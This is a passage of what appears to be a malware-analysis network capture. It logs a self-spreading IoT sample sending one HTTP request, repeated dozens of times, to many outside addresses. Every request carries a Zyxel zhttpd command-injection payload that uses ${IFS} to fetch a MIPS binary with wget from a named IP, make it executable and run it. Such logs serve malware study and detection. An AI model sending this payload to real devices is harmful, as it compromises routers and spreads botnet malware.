                                    Jan 13, 2024 19:02:43.405945063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6818192.168.2.135458467.73.238.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406008005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6819192.168.2.1356268117.27.127.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406060934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6820192.168.2.1333080144.208.36.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406090975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6821192.168.2.135352094.25.130.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406188011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6822192.168.2.1358906178.43.154.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406243086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6823192.168.2.1335294199.74.239.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406306028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6824192.168.2.1345550213.217.2.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406373024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6825192.168.2.135978854.131.159.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406436920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6826192.168.2.1354788142.198.165.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406492949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6827192.168.2.134607247.58.238.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406526089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6828192.168.2.1335476176.57.78.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406595945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6829192.168.2.1337922108.28.141.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406652927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6830192.168.2.1345500133.245.21.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406686068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6831192.168.2.1338618149.193.37.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406738997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6832192.168.2.133583081.192.89.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406837940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6833192.168.2.1348232221.61.229.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406891108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6834192.168.2.1358520158.63.40.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406929970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6835192.168.2.134877218.61.196.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.406997919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6836192.168.2.1348040107.229.252.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407040119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6837192.168.2.1346530206.237.227.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407130003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6838192.168.2.1343730208.66.95.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407170057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6839192.168.2.134731438.2.133.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407244921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6840192.168.2.1352346102.194.28.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407298088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6841192.168.2.1358786144.65.249.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407349110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6842192.168.2.1340426194.189.155.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407390118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6843192.168.2.135619075.106.244.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407465935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6844192.168.2.1350736129.50.75.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407497883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6845192.168.2.1338494116.157.152.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407553911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6846192.168.2.134210213.12.66.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407598972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6847192.168.2.134092885.220.254.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407658100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6848192.168.2.1334318130.127.143.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407741070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6849192.168.2.1356620108.199.143.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407744884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6850192.168.2.1356562148.120.209.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407795906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6851192.168.2.1354484178.97.241.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407891989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6852192.168.2.1348104185.64.58.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407932997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6853192.168.2.1360852102.51.206.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.407974005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6854192.168.2.1346230120.128.187.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.408009052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6855192.168.2.1345800185.109.145.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.408067942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6856192.168.2.135346476.44.110.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.408169985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6857192.168.2.136004217.157.47.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.408231974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6858192.168.2.1354872157.156.167.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.408294916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6859192.168.2.133782891.21.134.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.408329010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6860192.168.2.1352808166.58.221.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.408382893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6861192.168.2.1345408122.0.101.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.420244932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6862192.168.2.1358784130.49.187.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.420475006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6863192.168.2.1352328172.87.103.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.420519114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6864192.168.2.1345062117.97.95.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.420588017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6865192.168.2.1347910158.76.103.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.420638084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6866192.168.2.1344012221.51.183.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.420689106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6867192.168.2.1356704220.3.118.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.420757055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6868192.168.2.1339248204.110.20.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.420768023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6869192.168.2.1344982121.163.244.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.420840025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6870192.168.2.1337340107.187.41.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.420891047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6871192.168.2.1352488111.144.163.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.420968056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6872192.168.2.134402075.47.111.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421001911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6873192.168.2.1340726218.89.157.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421072960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6874192.168.2.134246272.74.253.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421108007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6875192.168.2.133380853.75.54.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421185017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6876192.168.2.135387893.187.140.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421222925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6877192.168.2.1348488220.11.35.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421283007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6878192.168.2.133313846.94.40.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421334982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6879192.168.2.1334396185.149.130.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.421386003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6880192.168.2.1353066185.115.12.179443
                                    TimestampBytes transferredDirectionData
